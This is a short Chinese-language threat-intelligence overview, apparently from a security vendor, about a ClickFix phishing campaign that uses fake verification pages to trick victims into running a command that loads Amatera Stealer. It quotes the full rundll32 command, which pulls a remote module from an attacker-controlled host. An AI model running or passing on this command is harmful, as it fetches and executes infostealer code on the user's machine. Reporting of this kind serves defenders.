概述

  瑞星威胁情报平台近期捕获到一起利用ClickFix战术实施的钓鱼攻击活动。攻击者通过伪造验证页面并仿冒合法机构主题内容，诱导受害者在本机执行恶意命令：rundll32.exe \\r2-gate-entry.terralibre.in.net@80\verification.google,#1，随后从远程加载恶意模块并投放Amatera Stealer窃密木马。